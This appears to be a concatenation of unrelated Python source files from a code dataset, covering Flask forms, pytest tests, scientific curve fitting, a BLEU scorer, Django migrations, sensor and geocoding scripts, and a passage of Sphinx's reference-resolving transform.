        # b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * dJdb[len(n) - 1 - ini_i]
    j = j + 1
    # print(dJdW)
print("iteration times is:%d" % j)
# test result
# print(test.caculate_W_batch_norm(X, Y, g, n))
# Final visualizations: ground truth, decision regions, predictions, cost curve.
show_ans(X, Y, m, ax1)
show_class(W, b, n, g, X_max, X_min, ax2)
show_ans(X, Y_tra, m, ax3)
show_err(ax4, err)
plt.show()
|
997,746 | d929e0a5ffce4708ecd3042435a696254f2d0e0c | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, DecimalField
from wtforms.validators import DataRequired
class ProductForm(FlaskForm):
    """Form for creating or editing a product (no validators are attached)."""
    name = StringField('Product Name')
    description = StringField('Product Description')
    # Price rendered/parsed with two decimal places.
    price = DecimalField('Per Unit Price', places=2)
    image = StringField('Product Image URL')
    submit = SubmitField()
class DeletePostForm(FlaskForm):
    """Form exposing only a submit button (e.g. a CSRF-protected delete confirmation)."""
    submit = SubmitField()
997,747 | 39c538142b70d8bf20a6015ce1a9adeebc674225 | #testing commands
# Smoke test: print a fixed message to confirm the toolchain runs this file.
print("New Python file")
|
997,748 | baa66480eda9edf19c46c53ae933c145c66f6e2d | #/usr/bin/python
# coding: utf-8
import pytest
import os
from src import hotcount_standalone
def test_writetofile(tmpdir):
    # Build a minimal {sample: {metric: count}} dict, write it with to_csv
    # into a pytest tmpdir, and check the CSV header (CRLF-terminated).
    count = {'TS_L251a_21_Ampliseq_2014-11-14.fastq': {'all': 550, 'wt': 282, 'delg': 24},
             'TS_L1095a_055_Ampliseq_AML_201-12-22.fastq': {'all': 317, 'wt': 151, 'delg': 22}}
    res_file = tmpdir.mkdir("sub").join("result.txt")
    file = hotcount_standalone.to_csv(count, str(res_file))
    with open(file, 'r') as file:
        assert file.readline() == 'sample,all,wt,delg\r\n'
def test_to_dict():
    # to_dict should parse the result file back into the nested
    # {sample_path: {metric: value}} mapping. Note that diff() iterates its
    # arguments, so for dicts only the top-level KEYS are compared here.
    assert diff(hotcount_standalone.to_dict("resources/testfile/test2.txt"),
                {'/home/aurelien/HotCount_project/hotcount/data/asxl1/dupG_Pos/TS_L251a_21_Ampliseq_2014-11-14.fastq': {'all': '750', 'delg': '420', 'wt': '140'},
                 "/home/aurelien/HotCount_project/hotcount/data/asxl1/dupG_Pos/TS_L1095a_055_Ampliseq_AML_201-12-22.fastq": {'all': '317', 'delg': '151', 'wt': '22'}}) == 0
def test_count():
    # Run a count over the bundled FASTQ fixture directory and check the
    # header plus the first data row written to result.txt.
    hotcount_standalone.StandAlone().count(
        {'all': 'ATCGGAGGG.*GGGTGGCCC', 'wt': 'ATCGGAGGGGGGGGTGGCCC', 'delg': 'ATCGGAGGGGGGGTGGCCC'},
        'resources/testfile/asxl1/file1/', 'FASTQ', True, "DNA", "result.txt")
    with open("result.txt", 'r') as file:
        assert file.readline() == 'sample,all,wt,delg\r\n'
        assert file.readline() == "resources/testfile/asxl1/file1/TS_L251a_21_Ampliseq_2014-11-14.fastq, 550,282,24\r\n"
def test_stat():
    # Placeholder: stat() is not covered yet.
    #hotcount_standalone.StandAlone().stat()
    pass
def test_all():
    # Placeholder for an end-to-end test.
    pass
def diff(list1, list2):
    """Return the number of elements present in exactly one of the inputs.

    This is the size of the symmetric difference of the two iterables,
    ignoring duplicates; 0 means both contain the same distinct elements.
    Used by the tests to compare a computed collection against a known one.

    Note: when called with dicts (as in test_to_dict) only the KEYS are
    compared, because iterating a dict yields its keys.
    """
    # Equivalent to the original union-minus-intersection computation.
    return len(set(list1) ^ set(list2))
997,749 | 23be3289a2537779c09796714b528d5a7f8dd92e | # methods for jet tracking that do not involve the camera
import numpy as np
from scipy.optimize import curve_fit
def gaussianslope(x, a, mean, std, m, b):
    '''
    Define the function for a Gaussian on a slope (Gaussian + linear)

    Bug fix: the exponent is now the standard Gaussian form
    -(x - mean)**2 / (2 * std**2). The previous expression,
    (-((x - mean) / 2 / std) ** 2), divided by 4*std**2 instead of
    2*std**2, so the fitted ``std`` did not correspond to the actual
    standard deviation of the peak (the fit still converged, but the
    width parameter was mis-scaled).

    Parameters
    ----------
    x : float
        x-coordinate
    a : float
        amplitude of Gaussian
    mean : float
        mean of Gaussian
    std : float
        standard deviation of Gaussian
    m : float
        slope of linear baseline
    b : float
        y-intercept of linear baseline

    Returns
    -------
    y : float
        the y-coordinate for the given x-coordinate as defined by the
        parameters given for the Gaussian on a slope
    '''
    return (a * np.exp(-((x - mean) ** 2) / (2.0 * std ** 2))) + (m * x + b)
def fit_cspad(azav, norm, gas_det):
    '''
    Fit the Azimuthal average of the CSPAD to a Gaussian on a slope

    Parameters
    ----------
    azav : ndarray
        Azimuthal average for CSPAD
    norm : ndarray
        number of pixels in each qbin
    gas_det : float
        gas detector, used to normalize the ring intensity

    Returns
    -------
    center : int
        radius (qbin index) of the diffraction ring
    intensity : float
        sum of qbins 5 above and below the center, normalized by gas detector
    '''
    # Determine a usable qbin range by walking outward from the middle and
    # shrinking [start, end] past bins with fewer than 150 pixels.
    # **can change 150 to different value if needed
    start = 0
    end = len(norm)
    # Bug fix: integer division — under Python 3, `end / 2` is a float and
    # range() raises TypeError.
    begin = end // 2
    for i in range(begin):
        a = begin - i
        b = begin + i
        if (norm[a] < 150) and (a > start):
            start = a
        if (norm[b] < 150) and (b < end):
            end = b
    # NOTE(review): start/end are computed but never used below — the fit
    # runs over the full azav. Either trim to azav[start:end] or remove the
    # loop; confirm intent before changing behavior.
    x = np.arange(len(azav))
    # estimate mean and standard deviation for Gaussian
    n = len(x)
    mean = sum(x * azav) / sum(azav)
    std = np.sqrt(sum((x - mean) ** 2) / n)
    # estimate slope and y-intercept for linear baseline by taking first &
    # last 50 points and fitting a line between them
    # **can change 50 to different value if needed
    x0 = 50 / 2
    l = len(azav)
    x1 = l - (50 / 2)
    y0 = np.mean(azav[0:50])
    y1 = np.mean(azav[l - 50:])
    m, b = np.polyfit((x0, x1), (y0, y1), 1)
    # fit Gaussian + linear to Azimuthal average; provide initial parameters
    popt, pcov = curve_fit(gaussianslope, x, azav, p0=[max(azav), mean, std, m, b])
    # calculate radius of ring and intensity of center 10 qbins
    center = int(round(popt[1]))
    intensity = sum(azav[center - 5:center + 5]) / gas_det
    return center, intensity
def get_cspad(azav, r, gas_det):
    '''
    Return the diffraction-ring intensity from an azimuthal average.

    Sums the 10 qbins surrounding radius ``r`` (5 below through 4 above)
    and normalizes by the gas detector reading.

    Parameters
    ----------
    azav : ndarray
        Azimuthal average calculated from CSPAD
    r : int
        radius of diffraction ring
    gas_det : float
        gas detector

    Returns
    -------
    intensity : float
        normalized sum of the qbins around the ring
    '''
    ring_window = azav[r - 5:r + 5]
    return sum(ring_window) / gas_det
# unfinished methods for checking stopper, pulse picker, and Wave8
# can make Ophyd devices or load specific PV needed directly into beamline.py
def get_stopper(stopper):
    # Placeholder: returns its argument unchanged. Per the note above, this
    # is meant to become an Ophyd device or a direct PV read.
    return stopper
def get_pulse_picker(pulse_picker):
    # Placeholder: returns its argument unchanged (pulse-picker readout TBD).
    return pulse_picker
def get_wave8(wave8):
    # Placeholder: returns its argument unchanged (Wave8 readout TBD).
    return wave8
|
997,750 | 73f51d8b3acd9ad305dda6aa1b0bf980718dd591 | from src.transpiler.syntax_tree import *
from src.grammar.nodes.expression import Expression
class Declaration(Node):
    # Grammar (from GlobalVariable below):
    # DECLARATION = seq(TYPE, VARIABLE_NAME,
    #                   opt(Choice(seq('=', EXPRESSION),
    #                              Repeat(seq(',', VARIABLE_NAME)))))
    def is_init(self):
        """
        Returns true, if the declaration also contains an initialization.
        :return:
        """
        # Exactly 4 children with an Expression in slot 3 means the
        # '=' EXPRESSION branch of the optional part was taken.
        if len(self.children) == 4:
            return isinstance(self.children[3], Expression)
        return False

    def write(self, int_state, block=None):
        # Only write the initialization. Declaration is handled by top level objects.
        if self.is_init():
            # Emit "<name> := <expression>" into the current block.
            block.append_line(self.children[1].string + ' := ')
            self.children[3].write(int_state, block)


Node.node_map['DECLARATION'] = Declaration
class GlobalVariable(Node):
    """Writes a global variable declaration (and any initialization) into
    the interpreter state's globals/init blocks."""

    def write(self, int_state, block=None):
        # GLOBAL = seq(DECLARATION, ';')
        declaration = self.children[0]
        int_state.globals.append_line(declaration.children[1].string)
        # DECLARATION = seq(TYPE, VARIABLE_NAME, opt(Choice(seq('=', EXPRESSION), Repeat(seq(',', VARIABLE_NAME)))))
        # If the declaration contains at least 4 elements,
        # it has either an initialization or contains multiple variable names.
        if len(declaration.children) >= 4:
            if isinstance(declaration.children[3], Expression):  # Initialization.
                # seq(TYPE, VARIABLE_NAME, '=', EXPRESSION)
                int_state.init.append_line(declaration.children[1].string + ' := ')
                declaration.children[3].write(int_state, int_state.init)
                int_state.init.append(';')
            else:  # Multiple declarations.
                # seq(TYPE, VARIABLE_NAME, Repeat(seq(',', VARIABLE_NAME)))
                # additional names are at positions 3 + 2 * k
                for i in range(3, len(declaration.children), 2):
                    int_state.globals.append(', ' + declaration.children[i].string)
        # Type and semi colon.
        int_state.globals.append(' : ' + declaration.children[0].translated() + ';')


Node.node_map['GLOBAL'] = GlobalVariable
class Constant(Node):
    """Writes a constant definition into the constants block."""

    def write(self, int_state, block=None):
        # CONSTANT = seq(Keyword('const'), opt(TYPE), VARIABLE_NAME, '=', LITERAL, ';')
        name = self.children[1].translated()
        value = self.children[3].translated()
        if value == '=':  # opt(TYPE) is used.
            # children[1] was the TYPE token, so name/value sit one slot later.
            name = self.children[2].translated()
            value = self.children[4].translated()
        int_state.constants.append_line(name + ' = ' + value + ';')


Node.node_map['CONSTANT'] = Constant
|
997,751 | 306a0acad858ba4af0c4ccb83eaa285f36b81e21 | import argparse
import fasttext
from functools import reduce
import math
import pdb
import operator
from sklearn.metrics import accuracy_score
model=fasttext.load_model('./train.sentiment.bin')
def geometric_mean(precisions):
    """Return the geometric mean of a non-empty sequence of precisions."""
    product = 1.0
    for precision in precisions:
        product *= precision
    return product ** (1.0 / len(precisions))
def clip_count(cand_d, ref_ds):
    '''
    Return the clipped count of candidate n-grams against the reference.

    Each candidate n-gram contributes at most the number of times it
    appears in the reference (standard BLEU clipping).

    arguments:
        cand_d: candidate n-gram counts, e.g. {'I': 1, 'had': 1, 'a': 1, 'dinner': 1}
        ref_ds: reference n-gram counts in the same format
    returns:
        total clipped count (int)
    '''
    # The commented-out multi-reference variant has been removed; this
    # implementation handles the single-reference case the callers use.
    count = 0
    for ngram, cand_occurrences in cand_d.items():
        ref_occurrences = ref_ds.get(ngram, 0)
        count += min(cand_occurrences, ref_occurrences)
    return count
def ngram_precision(candidate, references, n):
    """
    Compute the modified n-gram precision over a corpus.

    ``candidate`` and ``references`` are parallel lists of sentences
    (strings); references[si] is the single reference for candidate[si].

    Returns clipped n-gram matches divided by the total number of
    candidate n-grams, or 0 when there are no matches.
    """
    def _count_ngram(sentence, n):
        # Count lowercased n-grams of one sentence.
        ngram_d = {}
        words = sentence.strip().split()
        limits = len(words) - n + 1
        for i in range(limits):
            ngram = ' '.join(words[i:i + n]).lower()
            # dict.get idiom replaces the `if ngram in ngram_d.keys()` branch.
            ngram_d[ngram] = ngram_d.get(ngram, 0) + 1
        return ngram_d

    clipped_count = 0
    count = 0
    for si in range(len(candidate)):
        ref_counts = _count_ngram(references[si], n)
        cand_dict = _count_ngram(candidate[si], n)
        clipped_count += clip_count(cand_dict, ref_counts)
        # Total candidate n-grams (was a manual accumulation loop).
        count += sum(cand_dict.values())
    if clipped_count == 0:
        pr = 0
    else:
        pr = float(clipped_count) / count
    return pr
def brevity_penalty(c, r):
    """BLEU brevity penalty: 1 when candidate length c exceeds reference
    length r, otherwise exp(1 - r/c)."""
    if c > r:
        return 1
    return math.exp(1 - (float(r) / c))
def best_length_match(ref_lens, cand_len):
    """
    Return the reference length closest to the candidate length.

    Bug fix: the loop previously recomputed the difference as
    ``abs(cand_l - ref_len)`` — ``cand_l`` is undefined, so a NameError
    was raised as soon as a reference closer than the first one was
    found. It also never updated ``least_diff``, so at most one
    improvement would ever have been recorded. Ties keep the earliest
    reference length, as before.
    """
    best = ref_lens[0]
    least_diff = abs(cand_len - best)
    for ref_len in ref_lens:
        diff = abs(cand_len - ref_len)
        if diff < least_diff:
            least_diff = diff
            best = ref_len
    return best
def calculate_bp(candidate, references):
    """
    Compute the corpus-level BLEU brevity penalty.

    Sums candidate and reference token lengths over the corpus (one
    reference per candidate, matching the simplified single-reference
    setup used elsewhere in this module) and applies brevity_penalty
    to the totals. The commented-out multi-reference code has been
    removed.
    """
    r, c = 0, 0
    for si in range(len(candidate)):
        r += len(references[si].strip().split())
        c += len(candidate[si].strip().split())
    return brevity_penalty(c, r)
def getBleu(candidate, references):
    """Return (bleu, brevity_penalty, [p1, p2, p3, p4]) for the corpus."""
    # Modified precisions for n-gram orders 1 through 4.
    precisions = [ngram_precision(candidate, references, order)
                  for order in range(1, 5)]
    bp = calculate_bp(candidate, references)
    bleu = geometric_mean(precisions) * bp
    return bleu, bp, precisions
def getAccuracy(generated_sentence, labels, positive=None, negative=None, pred=None):
    """Classify each generated sentence with the module-level fastText
    sentiment model and return accuracy against ``labels``.

    positive/negative collect sentences by predicted class and pred the
    numeric predictions; all three default to fresh lists when not
    supplied (None-default idiom avoids shared mutable defaults).
    """
    if positive is None:
        positive = list()
        negative = list()
        pred = list()
    # #one sentence
    # if type(generated_sentence)==str:
    #     result=model.predict(generated_sentence, k=1, threshold=0.5)
    #     if '0' in result[0][0]:
    #         pred.append(0)
    #     elif '1' in result[0][0]:
    #         pred.append(1)
    #     return accuracy_score(true, pred)
    #
    for i in range(len(generated_sentence)):
        result = model.predict(generated_sentence[i], k=1, threshold=0.5)
        # fastText label strings contain '0' (negative) or '1' (positive).
        if '0' in result[0][0]:
            negative.append(generated_sentence[i])
            pred.append(0)
        elif '1' in result[0][0]:
            positive.append(generated_sentence[i])
            pred.append(1)
        else:
            print('classification error')
            # NOTE(review): interactive debugger left in library code —
            # remove pdb.set_trace() before unattended runs.
            pdb.set_trace()
    return accuracy_score(labels, pred)
|
997,752 | 550e245065105ad7d02ef64cfd5ffec3439e6f6c | N=int(input())
S = str(input())
# Caesar-shift every uppercase letter N positions, wrapping Z back to A.
# The modular form below replaces the original if/else single-wrap logic
# (which was only correct for 0 <= N <= 26, the problem's input range)
# and the manual character-by-character list copy.
ls = [chr((ord(ch) - ord("A") + N) % 26 + ord("A")) for ch in S]
print("".join(ls))
|
997,753 | 4c61fa68366aed9a39d4bace93c6b4413e727c9c | import serial
import pycurl
import StringIO
import re
import time
import requests
# Open the Arduino serial port at 9600 baud.
ser = serial.Serial('/dev/ttyACM0', 9600)
sensorDataOld = '0'
sensorDataNew = '1'
try:
    # Poll forever: whenever a changed CSV line arrives from the sensor,
    # parse it and forward the readings to the web endpoint.
    while 1 :
        sensorDataNew = ser.readline()
        if(sensorDataNew != sensorDataOld) :
            sensorList = sensorDataNew.split(',')
            urlToSend = 'http://erictest.strivemanagementgroup.com/prostudy/piFeed.php'
            # Strip non-digits from fields 1 and 2; 'l' and 'm' are
            # presumably light and moisture readings — confirm against the
            # Arduino sketch. 'd' looks like a fixed device id.
            payload = {'l':re.sub('[^0-9]', '', sensorList[1]), 'm':re.sub('[^0-9]', '', sensorList[2]), 'd':1}
            r = requests.get(urlToSend, params=payload)
            print(r.url)
            print (r.text)
            sensorDataOld = sensorDataNew
except KeyboardInterrupt:
    # Python 2 print statement: this script targets Python 2.
    print 'terminating'
997,754 | 26804231a1d427e50850f8b778f266b8eaadaff3 | # Generated by Django 2.1 on 2018-08-10 17:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial schema for the 'uni' app: Discipline, Student and Teacher
    # tables plus the Discipline<->Student M2M and Discipline->Teacher FK.
    # Auto-generated by Django 2.1 — avoid hand-editing beyond comments.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Discipline',
            fields=[
                ('discipline_id_num', models.CharField(max_length=20, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=200)),
                ('workload', models.IntegerField()),
                ('description', models.CharField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='Student',
            fields=[
                ('student_id_num', models.CharField(max_length=20, primary_key=True, serialize=False)),
                ('first_name', models.CharField(max_length=200)),
                ('last_name', models.CharField(max_length=200)),
                ('subscription_date', models.DateTimeField(verbose_name='Subscription Date')),
                ('year_in_school', models.CharField(choices=[('FR', 'Freshman'), ('SO', 'Sophomore'), ('JR', 'Junior'), ('SR', 'Senior'), ('GR', 'Graduate')], default='FR', max_length=2)),
            ],
        ),
        migrations.CreateModel(
            name='Teacher',
            fields=[
                ('teacher_id_number', models.CharField(max_length=20, primary_key=True, serialize=False)),
                ('first_name', models.CharField(max_length=200)),
                ('last_name', models.CharField(max_length=200)),
                ('subscription_date', models.DateField(verbose_name='subscription date')),
                ('area_of_domain', models.CharField(choices=[('CE', 'College of Engineering'), ('CAS', 'College of Arts and Sciences'), ('IA', 'International Affairs'), ('MCS', 'Mathematics and Computer Science'), ('MHS', 'Medicine and Health Sciences')], default='CE', max_length=3)),
            ],
        ),
        migrations.AddField(
            model_name='discipline',
            name='students',
            field=models.ManyToManyField(to='uni.Student'),
        ),
        migrations.AddField(
            model_name='discipline',
            name='teacher',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='uni.Teacher'),
        ),
    ]
997,755 | bed09a50076d72ab86693a3cb46345c2f7f7476b | #!/usr/bin/env python3
# Write a line to "lalala", then read it back and echo it.
# "with" guarantees the handles are closed even if an error occurs,
# replacing the manual open()/close() pairs.
with open("lalala", "w") as out_file:
    out_file.write("hello word\n")

with open("lalala", "r") as in_file:
    for line in in_file:
        print(line, end='')
997,756 | 35411ee4dcc1df0b2b4b2a59de7c2610a1ec4e3a | """
BATCH - How it works
async def get_location(address)
1. Put the address on a queue of requests.
2. Start a background task that:
i. Waits a short time for other requests to be enqueued.
ii. Processes all queued requests as a batch.
iii. Notifies the waiting 'get_location' functions.
3. Wait for the result and return it.
"""
import asyncio
import json
from urllib.parse import urlencode
import aiohttp
# Constants for accessing the Geoapify batch API
GEOCODING_BATCH_API = "https://api.geoapify.com/v1/batch/geocode/search"
YOUR_API_KEY = "xxxx-xxxx-xxxx-xxxx"
async def get_locations(addresses):
    """Return a dictionary of address -> (lat, lon).

    Sends all addresses to the Geoapify batch geocoding API in a single
    POST, then polls the same endpoint until the batch result is ready.
    """
    # Construct the URL to do the batch request
    query_string = urlencode({"apiKey": YOUR_API_KEY})
    url = f"{GEOCODING_BATCH_API}?{query_string}"
    # Build the JSON payload for the batch POST request
    data = json.dumps(addresses)
    # And use Content-Type: application/json in the headers
    headers = {"Content-Type": "application/json", "Accept": "application/json"}
    # One ClientSession for the POST and all polling GETs: reuses the
    # connection pool instead of opening a fresh session per poll
    # iteration as the previous version did.
    async with aiohttp.ClientSession() as session:
        # Make the POST request to the API
        async with session.post(url, data=data, headers=headers) as response:
            response_json = await response.read()
            response_data = json.loads(response_json)
        # The API can return a dict with a pending status if it needs more
        # time to complete. Poll the API until the result is ready.
        while isinstance(response_data, dict) and response_data.get("status") == "pending":
            # Wait a bit before calling the API
            await asyncio.sleep(0.1)
            # Query the result to see if it's ready yet
            request_id = response_data.get("id")
            async with session.get(url + f"&id={request_id}") as response:
                response_json = await response.read()
                response_data = json.loads(response_json)
    # Gather the results into a dictionary of address -> (lat, lon)
    locations = {}
    for result in response_data:
        address = result["query"]["text"]
        coords = result["lat"], result["lon"]
        locations[address] = coords
    return locations
997,757 | 1b53918d324ad62b336781e35772ccb1e52848eb | #!/usr/bin/env python
from socketIO_client import SocketIO, BaseNamespace
import requests,json,sys
'''
This file suppose deploy on the docker container with python image
pre-configed.
It will listen to the socketIO server side if there is any link event
such as node failure, link failure.
'''
# Disable warnings about unverified certificates
if hasattr(requests, 'packages') and hasattr(requests.packages, 'urllib3'):
requests.packages.urllib3.disable_warnings()
# load from your config file plz...
serverURL = 'https://1.1.1.1'
username = '*******'
password = '*******'
class NSNotificationNamespace(BaseNamespace):
    # socketIO namespace bound to /restNotifications-v2; prints link/node
    # topology events pushed by the NorthStar server. (Python 2 prints.)
    def on_connect(self):
        print('Connected to %s:8443/restNotifications-v2'%serverURL)

    # NOTE(review): declared without an explicit 'self' — the bound
    # instance arrives in 'key', the event name in 'name' and the payload
    # in 'data'. It works as dispatched by socketIO_client, but renaming
    # the first parameter to 'self' would be clearer; confirm before
    # changing.
    def on_event(key,name,data):
        print "NorthStar Event: %r,data:%r"%(name,json.dumps(data))
        if data['notificationType'] == 'link':
            # Link up/down update: print endpoints and status.
            print 'Got Link update: '
            obj = data['object']
            print 'id: ',obj['id']
            from_ = obj['endA']
            to = obj['endZ']
            print 'from ',from_['ipv4Address']['address']
            print 'to ',to['ipv4Address']['address']
            print 'status: ', obj['operationalStatus']
        elif data['notificationType'] == 'node':
            print 'Got Node update'
        else:
            print 'Got Unknown update'
        print ''
# First use NorthStar OAuth2 authentication API to get a token,
# then open the socketIO notification channel with that token.
payload = {'grant_type': 'password','username': username,'password': password}
r = requests.post(serverURL + ':8443/oauth2/token',data=payload,verify=False,auth=(username, password))
data =r.json()
# Bail out when the credentials were rejected (no token in the response).
if "token_type" not in data or "access_token" not in data:
    print "Error: Invalid credentials"
    sys.exit(1)
# e.g. "Bearer <token>" authorization header built from the OAuth2 reply.
headers= {'Authorization': "{token_type} {access_token}".format(**data)}
socketIO = SocketIO(serverURL, 8443,verify=False,headers= headers)
ns = socketIO.define(NSNotificationNamespace, '/restNotifications-v2')
# Block forever, dispatching incoming notifications to the namespace.
socketIO.wait()
997,758 | 9eabd78864709d55efb13130be4583d7c74fc2ed | from django.contrib import admin
from demo.models.application import application
from demo.models.product import product
from demo.models.indication import indication
from demo.models.personne import Personne
from import_export.admin import ImportExportModelAdmin
@admin.register(application)
class applicationAdmin(ImportExportModelAdmin):
    # Admin with django-import-export support for the application model.
    pass
@admin.register(product)
class productAdmin(ImportExportModelAdmin):
    # Admin with django-import-export support for the product model.
    pass
@admin.register(indication)
class indicationAdmin(ImportExportModelAdmin):
    # Admin with django-import-export support for the indication model.
    pass
@admin.register(Personne)
class PersonneAdmin(ImportExportModelAdmin):
    """Admin with django-import-export support for the Personne model.

    Renamed from 'indicationAdmin': the previous name collided with the
    indication admin class defined above, shadowing it at module level.
    The name is only bound at module scope, so the registration done by
    the decorator is unaffected.
    """
    pass
997,759 | 2831ec2beee9ad9ea6ded5e532e1ba34fe698d97 | from django.urls import path
from .views import (
PlaceListAPIView,
PlaceDetailAPIView,
PlaceUpdateAPIView,
)
# URL routes for the places API: list, detail and update endpoints.
urlpatterns=[
    path('',PlaceListAPIView.as_view(),name='list'),
    path('<slug:slug>/detail',PlaceDetailAPIView.as_view(),name='detail'),
    path('<slug:slug>/update',PlaceUpdateAPIView.as_view(),name='update'),
]
997,760 | a02f81207bb180262f692c7f5648902ed4f1e3bd | # invoer
# input: paper thickness and distance to the celestial body, both in mm
# (prompts are in Dutch, matching the rest of the program's output)
dikte_papier = int(input('dikte papier (in mm): '))
afstand_hemellichaam = int(input('afstand tot hemellichaam (in mm): '))

# calculation: double the folded-paper thickness until it reaches the
# distance, counting the number of folds
aantal_keer_vouwen = 0
hoogte_gevouwen_papier = dikte_papier
while hoogte_gevouwen_papier < afstand_hemellichaam:
    aantal_keer_vouwen += 1
    hoogte_gevouwen_papier *= 2

# Dutch template: "After {} folds the paper thickness is {} mm."
uitvoer = 'Na {} keer vouwen bedraagt de dikte van het papier {} mm.'

# output
print(uitvoer.format(aantal_keer_vouwen, hoogte_gevouwen_papier))
|
997,761 | 6bd5f07e27e8b836cf04465ee7c47a0dd3730e45 | """Docutils transforms used by Sphinx."""
from __future__ import annotations
import re
from typing import TYPE_CHECKING, Any, cast
from docutils import nodes
from docutils.nodes import Element, Node
from sphinx import addnodes
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import find_pending_xref_condition, process_only_nodes
if TYPE_CHECKING:
from collections.abc import Sequence
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
    """A base class of post-transforms.

    Post transforms are invoked to modify the document to restructure it for outputting.
    They resolve references, convert images, do special transformation for each output
    formats and so on. This class helps to implement these post transforms.
    """
    # Restrict the transform to specific builder names / output formats;
    # empty tuples mean "applies to every builder/format".
    builders: tuple[str, ...] = ()
    formats: tuple[str, ...] = ()

    def apply(self, **kwargs: Any) -> None:
        # Template method: delegate to run() only when this transform
        # applies to the current builder (see is_supported).
        if self.is_supported():
            self.run(**kwargs)

    def is_supported(self) -> bool:
        """Check this transform working for current builder."""
        if self.builders and self.app.builder.name not in self.builders:
            return False
        if self.formats and self.app.builder.format not in self.formats:
            return False
        return True

    def run(self, **kwargs: Any) -> None:
        """Main method of post transforms.

        Subclasses should override this method instead of ``apply()``.
        """
        raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
    """
    Resolves cross-references on doctrees.
    """

    # Runs very early among post-transforms so later transforms see
    # resolved reference nodes.
    default_priority = 10

    def run(self, **kwargs: Any) -> None:
        for node in self.document.findall(addnodes.pending_xref):
            # Prefer a "resolved" pending_xref_condition child as the
            # displayed content, falling back to the node's first child.
            content = self.find_pending_xref_condition(node, ("resolved", "*"))
            if content:
                contnode = cast(Element, content[0].deepcopy())
            else:
                contnode = cast(Element, node[0].deepcopy())

            newnode = None

            typ = node['reftype']
            target = node['reftarget']
            node.setdefault('refdoc', self.env.docname)
            refdoc = node.get('refdoc')
            domain = None

            try:
                if 'refdomain' in node and node['refdomain']:
                    # let the domain try to resolve the reference
                    try:
                        domain = self.env.domains[node['refdomain']]
                    except KeyError as exc:
                        raise NoUri(target, typ) from exc
                    newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
                                                  typ, target, node, contnode)
                # really hardwired reference types
                elif typ == 'any':
                    newnode = self.resolve_anyref(refdoc, node, contnode)
                # no new node found? try the missing-reference event
                if newnode is None:
                    newnode = self.app.emit_firstresult('missing-reference', self.env,
                                                        node, contnode,
                                                        allowed_exceptions=(NoUri,))
                # still not found? warn if node wishes to be warned about or
                # we are in nit-picky mode
                if newnode is None:
                    self.warn_missing_reference(refdoc, typ, target, node, domain)
            except NoUri:
                newnode = None

            if newnode:
                newnodes: list[Node] = [newnode]
            else:
                # Unresolved: keep the fallback content, preferring the
                # catch-all pending_xref_condition when one exists.
                newnodes = [contnode]
                if newnode is None and isinstance(node[0], addnodes.pending_xref_condition):
                    matched = self.find_pending_xref_condition(node, ("*",))
                    if matched:
                        newnodes = matched
                    else:
                        logger.warning(__('Could not determine the fallback text for the '
                                          'cross-reference. Might be a bug.'), location=node)

            node.replace_self(newnodes)

    def resolve_anyref(
        self, refdoc: str, node: pending_xref, contnode: Element,
    ) -> Element | None:
        """Resolve reference generated by the "any" role."""
        stddomain = self.env.get_domain('std')
        target = node['reftarget']
        results: list[tuple[str, Element]] = []
        # first, try resolving as :doc:
        doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
                                         'doc', target, node, contnode)
        if doc_ref:
            results.append(('doc', doc_ref))
        # next, do the standard domain (makes this a priority)
        results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
                                                  target, node, contnode))
        for domain in self.env.domains.values():
            if domain.name == 'std':
                continue  # we did this one already
            try:
                results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
                                                       target, node, contnode))
            except NotImplementedError:
                # the domain doesn't yet support the new interface
                # we have to manually collect possible references (SLOW)
                for role in domain.roles:
                    res = domain.resolve_xref(self.env, refdoc, self.app.builder,
                                              role, target, node, contnode)
                    if res and len(res) > 0 and isinstance(res[0], nodes.Element):
                        results.append((f'{domain.name}:{role}', res))
        # now, see how many matches we got...
        if not results:
            return None
        if len(results) > 1:
            # Ambiguous "any" target: warn with all candidates, then use
            # the first match below.
            def stringify(name: str, node: Element) -> str:
                reftitle = node.get('reftitle', node.astext())
                return f':{name}:`{reftitle}`'
            candidates = ' or '.join(stringify(name, role) for name, role in results)
            logger.warning(__("more than one target found for 'any' cross-"
                              'reference %r: could be %s'), target, candidates,
                           location=node)
        res_role, newnode = results[0]
        # Override "any" class with the actual role type to get the styling
        # approximately correct.
        res_domain = res_role.split(':')[0]
        if (len(newnode) > 0 and
                isinstance(newnode[0], nodes.Element) and
                newnode[0].get('classes')):
            newnode[0]['classes'].append(res_domain)
            newnode[0]['classes'].append(res_role.replace(':', '-'))
        return newnode

    def warn_missing_reference(self, refdoc: str, typ: str, target: str,
                               node: pending_xref, domain: Domain | None) -> None:
        # Decide whether to warn: node's refwarn flag, overridden by
        # nitpicky mode, then filtered by the nitpick ignore lists.
        warn = node.get('refwarn')
        if self.config.nitpicky:
            warn = True
            dtype = f'{domain.name}:{typ}' if domain else typ
            if self.config.nitpick_ignore:
                if (dtype, target) in self.config.nitpick_ignore:
                    warn = False
                # for "std" types also try without domain name
                if (not domain or domain.name == 'std') and \
                        (typ, target) in self.config.nitpick_ignore:
                    warn = False
            if self.config.nitpick_ignore_regex:
                def matches_ignore(entry_type: str, entry_target: str) -> bool:
                    return any(
                        (
                            re.fullmatch(ignore_type, entry_type)
                            and re.fullmatch(ignore_target, entry_target)
                        )
                        for ignore_type, ignore_target
                        in self.config.nitpick_ignore_regex
                    )
                if matches_ignore(dtype, target):
                    warn = False
                # for "std" types also try without domain name
                if (not domain or domain.name == 'std') and \
                        matches_ignore(typ, target):
                    warn = False
        if not warn:
            return

